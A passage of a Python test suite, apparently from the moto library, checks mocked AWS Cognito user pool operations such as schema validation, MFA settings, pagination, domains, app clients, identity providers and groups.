None).should.be.none string_no_max["StringAttributeConstraints"]["MinLength"].should.equal("10") string_no_max["StringAttributeConstraints"].get("MaxLength", None).should.be.none number_no_min["NumberAttributeConstraints"]["MaxValue"].should.equal("10") number_no_min["NumberAttributeConstraints"].get("MinValue", None).should.be.none number_no_max["NumberAttributeConstraints"]["MinValue"].should.equal("10") number_no_max["NumberAttributeConstraints"].get("MaxValue", None).should.be.none @mock_cognitoidp @pytest.mark.parametrize( ("constraint_type", "attribute"), [ ( "StringAttributeConstraints", { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "invalid_value"}, }, ), ( "StringAttributeConstraints", { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "invalid_value"}, }, ), ( "NumberAttributeConstraints", { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MaxValue": "invalid_value"}, }, ), ( "NumberAttributeConstraints", { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "invalid_value"}, }, ), ], ids=[ "invalid_min_length", "invalid_max_length", "invalid_max_value", "invalid_min_value", ], ) def test_create_user_pool_invalid_schema_values(constraint_type, attribute): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"Invalid {constraint_type} for schema attribute {attribute["Name"]}" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp @pytest.mark.parametrize( "attribute", [ { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "2049"}, }, { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MaxLength": "2049"}, }, ], ids=["invalid_min_length", "invalid_max_length"], ) def test_create_user_pool_string_schema_max_length_over_2048(attribute): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool(PoolName=str(uuid.uuid4()), Schema=[attribute]) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.{attribute["Name"]}: String attributes cannot have a length of more than 2048" ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_string_schema_min_bigger_than_max(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "email", "AttributeDataType": "String", "StringAttributeConstraints": {"MinLength": "2", "MaxLength": "1"}, } ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.email: Max length cannot be less than min length." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_create_user_pool_number_schema_min_bigger_than_max(): conn = boto3.client("cognito-idp", "us-west-2") with pytest.raises(ClientError) as ex: conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[ { "Name": "updated_at", "AttributeDataType": "Number", "NumberAttributeConstraints": {"MinValue": "2", "MaxValue": "1"}, } ], ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"user.updated_at: Max value cannot be less than min value." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_add_custom_attributes(): conn = boto3.client("cognito-idp", "us-west-2") pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] custom_attribute = {"Name": "banana", "AttributeDataType": "String"} res = conn.add_custom_attributes( UserPoolId=pool_id, CustomAttributes=[custom_attribute] ) res["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) res = conn.describe_user_pool(UserPoolId=pool_id) described_attribute = next( attr for attr in res["UserPool"]["SchemaAttributes"] if attr["Name"] == "custom:banana" ) # Skip verification - already covered by create_user_pool with custom attributes described_attribute.should_not.be.none @mock_cognitoidp def test_add_custom_attributes_existing_attribute(): conn = boto3.client("cognito-idp", "us-west-2") custom_attribute = { "Name": "banana", "AttributeDataType": "String", "DeveloperOnlyAttribute": True, } pool_id = conn.create_user_pool( PoolName=str(uuid.uuid4()), Schema=[custom_attribute] )["UserPool"]["Id"] with pytest.raises(ClientError) as ex: conn.add_custom_attributes( UserPoolId=pool_id, CustomAttributes=[custom_attribute] ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( f"custom:banana: Existing attribute already has name dev:custom:banana." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_list_user_pools(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) conn.create_user_pool(PoolName=name) result = conn.list_user_pools(MaxResults=10) result["UserPools"].should.have.length_of(1) result["UserPools"][0]["Name"].should.equal(name) @mock_cognitoidp def test_set_user_pool_mfa_config(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=name)["UserPool"]["Id"] # Test error for when neither token nor sms configuration is provided with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, MfaConfiguration="ON", ) ex.value.operation_name.should.equal("SetUserPoolMfaConfig") ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "At least one of [SmsMfaConfiguration] or [SoftwareTokenMfaConfiguration] must be provided." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Test error for when sms config is missing `SmsConfiguration` with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration={}, MfaConfiguration="ON", ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "[SmsConfiguration] is a required member of [SoftwareTokenMfaConfiguration]." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Test error for when `SmsConfiguration` is missing `SnsCaller` # This is asserted by boto3 with pytest.raises(ParamValidationError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration={"SmsConfiguration": {}}, MfaConfiguration="ON", ) # Test error for when `MfaConfiguration` is not one of the expected values with pytest.raises(ClientError) as ex: conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SoftwareTokenMfaConfiguration={"Enabled": True}, MfaConfiguration="Invalid", ) ex.value.response["Error"]["Code"].should.equal("InvalidParameterException") ex.value.response["Error"]["Message"].should.equal( "[MfaConfiguration] must be one of 'ON', 'OFF', or 'OPTIONAL'." ) ex.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) # Enable software token MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SoftwareTokenMfaConfiguration={"Enabled": True}, MfaConfiguration="ON", ) mfa_config.shouldnt.have.key("SmsMfaConfiguration") mfa_config["MfaConfiguration"].should.equal("ON") mfa_config["SoftwareTokenMfaConfiguration"].should.equal({"Enabled": True}) # Response from describe should match pool = conn.describe_user_pool(UserPoolId=user_pool_id)["UserPool"] pool["MfaConfiguration"].should.equal("ON") # Disable MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, MfaConfiguration="OFF", ) mfa_config.shouldnt.have.key("SmsMfaConfiguration") mfa_config.shouldnt.have.key("SoftwareTokenMfaConfiguration") mfa_config["MfaConfiguration"].should.equal("OFF") # Response from describe should match pool = conn.describe_user_pool(UserPoolId=user_pool_id)["UserPool"] pool["MfaConfiguration"].should.equal("OFF") # `SnsCallerArn` needs to be at least 20 long sms_config = {"SmsConfiguration": {"SnsCallerArn": "01234567890123456789"}} # Enable SMS MFA mfa_config = conn.set_user_pool_mfa_config( UserPoolId=user_pool_id, SmsMfaConfiguration=sms_config, MfaConfiguration="ON", ) mfa_config.shouldnt.have.key("SoftwareTokenMfaConfiguration") mfa_config["SmsMfaConfiguration"].should.equal(sms_config) mfa_config["MfaConfiguration"].should.equal("ON") @mock_cognitoidp def test_list_user_pools_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pools pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_user_pools_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pool clients pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = conn.list_user_pools(MaxResults=max_results, NextToken=next_token) result_2["UserPools"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_user_pools_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") # Given 10 user pool clients pool_count = 10 for _ in range(pool_count): conn.create_user_pool(PoolName=str(uuid.uuid4())) max_results = pool_count + 5 result = conn.list_user_pools(MaxResults=max_results) result["UserPools"].should.have.length_of(pool_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_details = conn.create_user_pool( PoolName=name, LambdaConfig={"PreSignUp": value}, AccountRecoverySetting={ "RecoveryMechanisms": [{"Name": "verified_email", "Priority": 1}] }, ) result = conn.describe_user_pool(UserPoolId=user_pool_details["UserPool"]["Id"]) result["UserPool"]["Name"].should.equal(name) result["UserPool"]["LambdaConfig"]["PreSignUp"].should.equal(value) result["UserPool"]["AccountRecoverySetting"]["RecoveryMechanisms"][0][ "Name" ].should.equal("verified_email") result["UserPool"]["AccountRecoverySetting"]["RecoveryMechanisms"][0][ "Priority" ].should.equal(1) @mock_cognitoidp def test_describe_user_pool_estimated_number_of_users(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.describe_user_pool(UserPoolId=user_pool_id) result["UserPool"]["EstimatedNumberOfUsers"].should.equal(0) users_count = random.randint(2, 6) for _ in range(users_count): conn.admin_create_user(UserPoolId=user_pool_id, Username=str(uuid.uuid4())) result = conn.describe_user_pool(UserPoolId=user_pool_id) result["UserPool"]["EstimatedNumberOfUsers"].should.equal(users_count) @mock_cognitoidp def test_describe_user_pool_resource_not_found(): conn = boto3.client("cognito-idp", "us-east-1") user_pool_id = "us-east-1_FooBar123" with pytest.raises(ClientError) as exc: conn.describe_user_pool(UserPoolId=user_pool_id) err = exc.value.response["Error"] err["Code"].should.equal("ResourceNotFoundException") err["Message"].should.equal(f"User pool {user_pool_id} does not exist.") @mock_cognitoidp def test_update_user_pool(): conn = boto3.client("cognito-idp", "us-east-1") name = str(uuid.uuid4()) user_pool_details = conn.create_user_pool( PoolName=name, Policies={ "PasswordPolicy": { "MinimumLength": 12, "RequireUppercase": False, "RequireLowercase": False, "RequireNumbers": False, "RequireSymbols": False, } }, ) new_policies = { "PasswordPolicy": { "MinimumLength": 16, "RequireUppercase": True, "RequireLowercase": True, "RequireNumbers": True, "RequireSymbols": True, } } conn.update_user_pool( UserPoolId=user_pool_details["UserPool"]["Id"], Policies=new_policies ) updated_user_pool_details = conn.describe_user_pool( UserPoolId=user_pool_details["UserPool"]["Id"] ) updated_user_pool_details["UserPool"]["Policies"].should.equal(new_policies) @mock_cognitoidp def test_delete_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.list_user_pools(MaxResults=10)["UserPools"].should.have.length_of(1) conn.delete_user_pool(UserPoolId=user_pool_id) conn.list_user_pools(MaxResults=10)["UserPools"].should.have.length_of(0) @mock_cognitoidp def test_create_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should_not.be.none @mock_cognitoidp def test_create_user_pool_domain_custom_domain_config(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) custom_domain_config = { "CertificateArn": "arn:aws:acm:us-east-1:{}:certificate/123456789012".format( ACCOUNT_ID ) } user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_domain( UserPoolId=user_pool_id, Domain=domain, CustomDomainConfig=custom_domain_config ) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should.equal("e2c343b3293ee505.cloudfront.net") @mock_cognitoidp def test_describe_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.describe_user_pool_domain(Domain=domain) result["DomainDescription"]["Domain"].should.equal(domain) result["DomainDescription"]["UserPoolId"].should.equal(user_pool_id) result["DomainDescription"]["AWSAccountId"].should_not.be.none @mock_cognitoidp def test_delete_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.delete_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result = conn.describe_user_pool_domain(Domain=domain) # This is a surprising behavior of the real service: describing a missing domain comes # back with status 200 and a DomainDescription of {} result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["DomainDescription"].keys().should.have.length_of(0) @mock_cognitoidp def test_update_user_pool_domain(): conn = boto3.client("cognito-idp", "us-west-2") domain = str(uuid.uuid4()) custom_domain_config = { "CertificateArn": "arn:aws:acm:us-east-1:{}:certificate/123456789012".format( ACCOUNT_ID ) } user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_domain(UserPoolId=user_pool_id, Domain=domain) result = conn.update_user_pool_domain( UserPoolId=user_pool_id, Domain=domain, CustomDomainConfig=custom_domain_config ) result["ResponseMetadata"]["HTTPStatusCode"].should.equal(200) result["CloudFrontDomain"].should.equal("e2c343b3293ee505.cloudfront.net") @mock_cognitoidp def test_create_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, CallbackURLs=[value] ) result["UserPoolClient"]["UserPoolId"].should.equal(user_pool_id) bool(re.match(r"^[0-9a-z]{26}$", result["UserPoolClient"]["ClientId"])).should.be.ok result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"].should_not.have.key("ClientSecret") result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_create_user_pool_client_returns_secret(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, GenerateSecret=True, CallbackURLs=[value], ) result["UserPoolClient"]["UserPoolId"].should.equal(user_pool_id) bool(re.match(r"^[0-9a-z]{26}$", result["UserPoolClient"]["ClientId"])).should.be.ok result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"]["ClientSecret"].should_not.be.none result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_list_user_pool_clients(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) result = conn.list_user_pool_clients(UserPoolId=user_pool_id, MaxResults=10) result["UserPoolClients"].should.have.length_of(1) result["UserPoolClients"][0]["ClientName"].should.equal(client_name) @mock_cognitoidp def test_list_user_pool_clients_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_user_pool_clients_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results, NextToken=next_token ) result_2["UserPoolClients"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_user_pool_clients_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 user pool clients client_count = 10 for _ in range(client_count): client_name = str(uuid.uuid4()) conn.create_user_pool_client(UserPoolId=user_pool_id, ClientName=client_name) max_results = client_count + 5 result = conn.list_user_pool_clients( UserPoolId=user_pool_id, MaxResults=max_results ) result["UserPoolClients"].should.have.length_of(client_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") client_name = str(uuid.uuid4()) value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=client_name, CallbackURLs=[value] ) result = conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"] ) result["UserPoolClient"]["ClientName"].should.equal(client_name) result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(value) @mock_cognitoidp def test_update_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") old_client_name = str(uuid.uuid4()) new_client_name = str(uuid.uuid4()) old_value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=old_client_name, CallbackURLs=[old_value] ) result = conn.update_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ClientName=new_client_name, CallbackURLs=[new_value], ) result["UserPoolClient"]["ClientName"].should.equal(new_client_name) result["UserPoolClient"].should_not.have.key("ClientSecret") result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(new_value) @mock_cognitoidp def test_update_user_pool_client_returns_secret(): conn = boto3.client("cognito-idp", "us-west-2") old_client_name = str(uuid.uuid4()) new_client_name = str(uuid.uuid4()) old_value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=old_client_name, GenerateSecret=True, CallbackURLs=[old_value], ) client_secret = client_details["UserPoolClient"]["ClientSecret"] result = conn.update_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ClientName=new_client_name, CallbackURLs=[new_value], ) result["UserPoolClient"]["ClientName"].should.equal(new_client_name) result["UserPoolClient"]["ClientSecret"].should.equal(client_secret) result["UserPoolClient"]["CallbackURLs"].should.have.length_of(1) result["UserPoolClient"]["CallbackURLs"][0].should.equal(new_value) @mock_cognitoidp def test_delete_user_pool_client(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] client_details = conn.create_user_pool_client( UserPoolId=user_pool_id, ClientName=str(uuid.uuid4()) ) conn.delete_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"] ) caught = False try: conn.describe_user_pool_client( UserPoolId=user_pool_id, ClientId=client_details["UserPoolClient"]["ClientId"], ) except conn.exceptions.ResourceNotFoundException: caught = True caught.should.be.true @mock_cognitoidp def test_create_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] result = conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(value) @mock_cognitoidp def test_list_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) result = conn.list_identity_providers(UserPoolId=user_pool_id, MaxResults=10) result["Providers"].should.have.length_of(1) result["Providers"][0]["ProviderName"].should.equal(provider_name) result["Providers"][0]["ProviderType"].should.equal(provider_type) @mock_cognitoidp def test_list_identity_providers_returns_max_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(max_results) result.should.have.key("NextToken") @mock_cognitoidp def test_list_identity_providers_returns_next_tokens(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(max_results) result.should.have.key("NextToken") next_token = result["NextToken"] result_2 = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results, NextToken=next_token ) result_2["Providers"].should.have.length_of(max_results) result_2.shouldnt.have.key("NextToken") @mock_cognitoidp def test_list_identity_providers_when_max_items_more_than_total_items(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] # Given 10 identity providers linked to a user pool identity_provider_count = 10 for _ in range(identity_provider_count): provider_name = str(uuid.uuid4()) provider_type = "Facebook" conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={}, ) max_results = identity_provider_count + 5 result = conn.list_identity_providers( UserPoolId=user_pool_id, MaxResults=max_results ) result["Providers"].should.have.length_of(identity_provider_count) result.shouldnt.have.key("NextToken") @mock_cognitoidp def test_describe_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) result = conn.describe_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name ) result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(value) @mock_cognitoidp def test_update_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) result = conn.update_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderDetails={"thing": new_value}, ) result["IdentityProvider"]["UserPoolId"].should.equal(user_pool_id) result["IdentityProvider"]["ProviderName"].should.equal(provider_name) result["IdentityProvider"]["ProviderType"].should.equal(provider_type) result["IdentityProvider"]["ProviderDetails"]["thing"].should.equal(new_value) @mock_cognitoidp def test_update_identity_provider_no_user_pool(): conn = boto3.client("cognito-idp", "us-west-2") new_value = str(uuid.uuid4()) with pytest.raises(conn.exceptions.ResourceNotFoundException) as cm: conn.update_identity_provider( UserPoolId="foo", ProviderName="bar", ProviderDetails={"thing": new_value} ) cm.value.operation_name.should.equal("UpdateIdentityProvider") cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_update_identity_provider_no_identity_provider(): conn = boto3.client("cognito-idp", "us-west-2") new_value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] with pytest.raises(conn.exceptions.ResourceNotFoundException) as cm: conn.update_identity_provider( UserPoolId=user_pool_id, ProviderName="foo", ProviderDetails={"thing": new_value}, ) cm.value.operation_name.should.equal("UpdateIdentityProvider") cm.value.response["Error"]["Code"].should.equal("ResourceNotFoundException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_delete_identity_providers(): conn = boto3.client("cognito-idp", "us-west-2") provider_name = str(uuid.uuid4()) provider_type = "Facebook" value = str(uuid.uuid4()) user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] conn.create_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name, ProviderType=provider_type, ProviderDetails={"thing": value}, ) conn.delete_identity_provider(UserPoolId=user_pool_id, ProviderName=provider_name) caught = False try: conn.describe_identity_provider( UserPoolId=user_pool_id, ProviderName=provider_name ) except conn.exceptions.ResourceNotFoundException: caught = True caught.should.be.true @mock_cognitoidp def test_create_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) description = str(uuid.uuid4()) role_arn = "arn:aws:iam:::role/my-iam-role" precedence = random.randint(0, 100000) result = conn.create_group( GroupName=group_name, UserPoolId=user_pool_id, Description=description, RoleArn=role_arn, Precedence=precedence, ) result["Group"]["GroupName"].should.equal(group_name) result["Group"]["UserPoolId"].should.equal(user_pool_id) result["Group"]["Description"].should.equal(description) result["Group"]["RoleArn"].should.equal(role_arn) result["Group"]["Precedence"].should.equal(precedence) result["Group"]["LastModifiedDate"].should.be.a("datetime.datetime") result["Group"]["CreationDate"].should.be.a("datetime.datetime") @mock_cognitoidp def test_create_group_with_duplicate_name_raises_error(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) with pytest.raises(ClientError) as cm: conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) cm.value.operation_name.should.equal("CreateGroup") cm.value.response["Error"]["Code"].should.equal("GroupExistsException") cm.value.response["ResponseMetadata"]["HTTPStatusCode"].should.equal(400) @mock_cognitoidp def test_get_group(): conn = boto3.client("cognito-idp", "us-west-2") user_pool_id = conn.create_user_pool(PoolName=str(uuid.uuid4()))["UserPool"]["Id"] group_name = str(uuid.uuid4()) conn.create_group(GroupName=group_name, UserPoolId=user_pool_id) result = conn.get_group(GroupName=group_name, UserPoolId=user_pool_id) result["Group"]["GroupName"].should.equal(group_name) result["Group"]["UserPoolId"].should.equal(user_pool_id) 